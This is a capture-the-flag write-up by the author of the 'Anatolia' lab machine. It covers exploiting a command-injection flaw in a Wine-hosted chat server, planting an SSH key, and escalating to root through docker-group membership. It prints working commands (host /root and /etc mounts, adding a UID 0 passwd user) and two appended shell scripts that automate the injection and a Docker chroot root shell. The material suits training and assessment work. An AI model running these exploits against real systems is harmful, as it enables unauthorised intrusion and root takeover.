Anatolia CTF Machine

This box is designed to have players hack the machine by reverse engineering the Malazgirt chat program. The goal is to break the server and client programs with reverse engineering, obtain a shell by sending commands from the client that the server executes, and then obtain root privileges by abusing the Docker setup on the machine.

In this post I share the reverse-engineering machine built around the Malazgirt chat program. The aim is to break the server and client programs by reverse engineering, obtain a shell by running commands on the server through the client, and then gain root privileges by exploiting Docker on the machine together with the vulnerabilities I deliberately added to the chat program I wrote.

I wrote the report and this post in English so that it reaches a wider audience; I am not translating it into Turkish and I hope that is not a problem. If it is, run it through Google Translate :)

WARNING
If you want to try the machine yourself before reading how it was hacked, please do not read beyond this point.
WARNING

1 Summary

1.1 General Information

This report contains the description and solution of the machine named Anatolia, which I built for GitHub.

The box is designed to have players hack the machine by reverse engineering the Malazgirt chat program: break the server and client programs, obtain a shell by sending commands from the client that the server executes, and then gain root privileges by abusing the Docker setup on the machine.

The vulnerability in the Malazgirt chat program, which is written in Visual Basic, has to be found by reverse engineering.

A reverse shell (or another form of remote access) is then obtained by exploiting the server program, which runs under Wine on the Linux server.

I made this challenge because of my interest in reverse engineering, and to see whether GitHub users can hack a server written for Windows when it is running on Linux.

1.1.1 Recommended Equipment

2 GB RAM

1 or 2 processor cores

Any video card

20 GB hard drive recommended (the system image is about 9 GB)

1.1.2 Key Processes and Automation

Automatic login for the gordion user is enabled with GNOME Tweaks, and an autostart entry launches malazgirtserver.exe through Wine, so the server starts as soon as the operating system boots.

Malazgirtserver.desktop file content:
[Desktop Entry]
Name=Malazgirtserver
Comment=A short description of the application
Exec=wine /home/gordion/.wine/drive_c/Malazgirtserver.exe
Icon=/full/path/to/icon-file
Terminal=true
Type=Application

Because the automatic login does not ask for a password, the server is running as gordion whenever the machine is on.

The Malazgirt server application has a command-execution vulnerability.

The attacker can download the server and client applications from the website served by Apache on port 80. The web page also carries hints: it states that Wine is running and that a Windows server program is running on Linux.

For privilege escalation, Docker 18.09.1 is installed and the gordion user has been added to the docker group. The group membership is what matters here: the Docker daemon runs as root, so any member of the docker group can bind-mount host directories into a container and read or write them as root, regardless of the Docker version.

Once the Docker binary is on the PATH (export PATH=$PATH:/sbin), root access is obtained through Docker, for example with:

docker run -v /root:/mnt -it alpine

1.1.3 Docker

No container is running on the box. The alpine image is present only so that it can be used during privilege escalation.

docker run -v /root:/mnt -it alpine

or, to read the password hashes:

docker run -v /etc/:/mnt -it alpine
cd /mnt
cat shadow

or, to add a new UID 0 user to the host's /etc/passwd (the hash is generated on the attacking machine; the find command lists SUID/SGID binaries during enumeration and is independent of the Docker step):

openssl passwd -1 -salt username password
find / \( -perm -u+s -or -perm -g+s \) -type f -exec ls -l {} \;
docker run -v /etc/:/mnt -it alpine
cd /mnt
echo 'username:$1$username$<hash>:0:0::/root:/bin/bash' >> passwd
tail passwd

1.1.4 Firewall Rules

None (default).

1.2 Producer

Information on the tester and the author of the report:

Pozitron (Hasan Ç.)

Engineer — Penetration tester

1.3 Network Settings

DNS and other settings: default

Network : Bridge mode

1.4 Gathering Information

1.4.1 Server and Service Information

192.168.1.13 (Anatolia)

Port   Protocol   Service
22     tcp        ssh
80     tcp        http
1071   tcp        chat program server (Malazgirt)

2 Anatolia Machine — Walkthrough

We start with the port scanning and information gathering phase.

Scanning with nmap:

Open ports: 22 (SSH), 80 (HTTP), 1071 (unknown).

First we visit port 80 and do some preliminary research.

It is a simple HTML website.

I enumerated the site content with Burp; the content was as follows:

Then I downloaded the client and the server program from the site and analyzed their code by decompiling them.

In the client I found a 223-character limit on message length.

Decompiling the server showed the counterpart of that limit: whatever follows the first 223 characters of a message is executed in the cmd shell.

A hard-coded password was also visible as a plain string in the decompiled code.

I ran the client and connected to port 1071 to test sending messages; the server worked without any problem.

Then, using the client's test command, I sent 223 characters of random data followed by the command to execute, and started testing.

I began by trying to create a test file in the site directories I had found earlier.

I saw that I had write permission to the logs directory, and the test file was written there.

Then I gathered the information I needed by reading /etc/passwd, listing the usernames and installed programs, and printing the test file.

I could have obtained a reverse shell or delivered a payload. But the commands I sent were executed by cmd, a Windows shell, since the program is written in Visual Basic and runs on Debian via Wine. Because the commands ran with the privileges of the gordion user, I instead created the ~/.ssh/authorized_keys file and connected over SSH.

I generated a key pair with ssh-keygen and wrote the public key into the .ssh folder with an echo command.

I then logged in over SSH with that key.
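The foothold described above, as an added example that is not part of the original writeup: a shell script that talks to the Malazgirt server directly, which is how the client's 223-character limit is bypassed. The wire format is not shown on the page, so the script assumes one message per line, plain ASCII, and that the server passes everything after character 223 to cmd verbatim; it also assumes Wine's default Z: drive mapping of the host root. The host address, port and user name are the ones listed in the report, and the filler character and the nc timeout are arbitrary choices.

```shell
#!/bin/sh
# Added example, not the writeup's own code. Assumptions: one message per
# line, ASCII text, the server hands everything after character 223 to
# cmd.exe, and Wine keeps its default Z:\ mapping of the host root.
set -eu

LIMIT=223                 # client-side message limit found by decompiling

# Mirror of the server's dispatch as the writeup describes it: up to LIMIT
# characters are chat text, the remainder is handed to the command shell.
# Prints the command part (empty if the message is within the limit).
server_command_part() {
    msg=$1
    if [ "${#msg}" -gt "$LIMIT" ]; then
        printf '%s' "$msg" | cut -c "$((LIMIT + 1))-"
    fi
}

# Build a message: LIMIT filler characters, then the command to run.
build_payload() {
    pad=$(head -c "$LIMIT" /dev/zero | tr '\000' 'A')
    printf '%s%s' "$pad" "$1"
}

# cmd.exe command that appends an SSH public key to the target user's
# authorized_keys through Wine's Z:\ drive (assumed default mapping).
authorized_keys_command() {
    pubkey=$1 user=${2:-gordion}
    printf 'echo %s >> Z:\\home\\%s\\.ssh\\authorized_keys' "$pubkey" "$user"
}

# Send one message to the chat server (nc with a short timeout so it exits).
send_payload() {
    printf '%s\r\n' "$3" | nc -w 2 "$1" "$2"
}

# Usage, kept commented so the file can be sourced:
# key=$(cat ~/.ssh/id_ed25519.pub)
# send_payload 192.168.1.13 1071 "$(build_payload "$(authorized_keys_command "$key")")"
# ssh gordion@192.168.1.13
```

If ~/.ssh does not exist yet on the target, send a mkdir command the same way first; the server runs it as gordion, which is also why the resulting SSH session is unprivileged.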

2.1 Privilege Escalation

During post-exploitation enumeration, the user turned out to be in the docker group, and can therefore start containers through the root-owned Docker daemon.

By creating a container with the host's /root directory mounted, I was able to read the flag file:

$ docker run -v /root/:/mnt -it alpine
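The escalation above and the Docker commands in the summary's Docker section, as one added example that is not the writeup's own code: a script that checks docker-group membership, builds the UID 0 passwd entry, and shows both the /root mount from the writeup and the more general whole-filesystem chroot. The chroot variant goes beyond what the page shows but works for the same reason (the daemon runs as root). docker and openssl must exist on the target; the group check and passwd-entry functions run anywhere. The user name, salt and PATH additions are illustrative.

```shell
#!/bin/sh
# Added example (not from the original writeup). Privilege escalation through
# docker-group membership: the daemon runs as root, so any group member can
# bind-mount host paths into a container. No Docker version bug is needed.
set -eu

# Does a group list, as printed by `id -nG`, contain docker?
in_docker_group() {
    for g in $1; do
        if [ "$g" = docker ]; then
            return 0
        fi
    done
    return 1
}

# Build an /etc/passwd line for a new UID 0 user. Putting the hash directly
# in field 2 means /etc/shadow is never consulted for this account.
root_passwd_entry() {
    printf '%s:%s:0:0::/root:/bin/bash' "$1" "$2"
}

# MD5-crypt hash for a password, as in the writeup (salt first, then password).
md5crypt_hash() {
    openssl passwd -1 -salt "$1" "$2"
}

# Writeup's approach: mount the host's /root into a container and list it.
list_host_root() {
    docker run --rm -v /root:/mnt alpine ls -la /mnt
}

# Writeup's second approach: append the UID 0 user to the host's /etc/passwd.
# The single quotes inside the container shell keep the $ signs of the hash.
add_root_user() {
    entry=$(root_passwd_entry "$1" "$2")
    docker run --rm -v /etc:/mnt alpine sh -c "echo '$entry' >> /mnt/passwd"
    echo "now run: su $1"
}

# Generalisation not shown on the page: mount the whole host filesystem and
# chroot into it for a root shell with the host's real tools and paths.
host_root_shell() {
    docker run --rm -it -v /:/mnt alpine chroot /mnt /bin/bash
}

main() {
    export PATH="$PATH:/sbin:/usr/sbin"   # the writeup needed /sbin on PATH
    if ! in_docker_group "$(id -nG)"; then
        echo "current user is not in the docker group" >&2
        return 1
    fi
    host_root_shell
}
# Uncomment to run on the target: main
```

The defensive reading is the same as the offensive one: docker-group membership is equivalent to root on the host, so it should be granted as deliberately as sudo, and a user found in that group during an assessment is a finding on its own.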

I hope you enjoyed this machine.
I specially designed this machine for Github users.
Thank you.
Yours truly

Engineer — Penetration testing specialist
Hasan Ç. (positron)

Geophysical Engineer, Information Security, Cyber Security and Penetration Tester Specialist. Blog: https://realradioactive.github.io/